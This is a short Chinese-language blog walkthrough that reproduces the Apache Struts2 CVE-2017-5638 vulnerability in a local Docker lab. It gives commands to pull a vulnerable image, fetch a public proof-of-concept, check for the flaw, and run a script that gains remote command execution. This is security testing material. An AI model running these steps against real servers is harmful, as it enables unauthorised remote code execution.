測試環境如下圖所示:

Ubuntu 16.04 安裝docker後pull測試用image後啟動container並進行測試.

 

STEP 1 .

啟動測試環境的docker

docker pull bharghav9/apachestrutscve-vuln-2017-5638

docker run -it -d -p 8080:8080 bharghav9/apachestrutscve-vuln-2017-5638

STEP 2 .

下載攻擊測試的程式碼: https://github.com/tengzhangchao/Struts2_045-Poc

安裝相依套件

sudo pip install poster

 

STEP 3 .

執行程式確認漏洞是否存在

python s2-045.py http://0.0.0.0:8080/apachestruts-cve20175638.action

STEP 4 .

執行攻擊程式碼後可取得控制權限:

python s2_045_cmd.py http://0.0.0.0:8080/apachestruts-cve20175638.action

 

arrow
arrow
    文章標籤
    cve-2017-5638 cve security docker
    全站熱搜

    Lung-Yu,Tsai 發表在 痞客邦 留言(0) 人氣()

    E-mail轉寄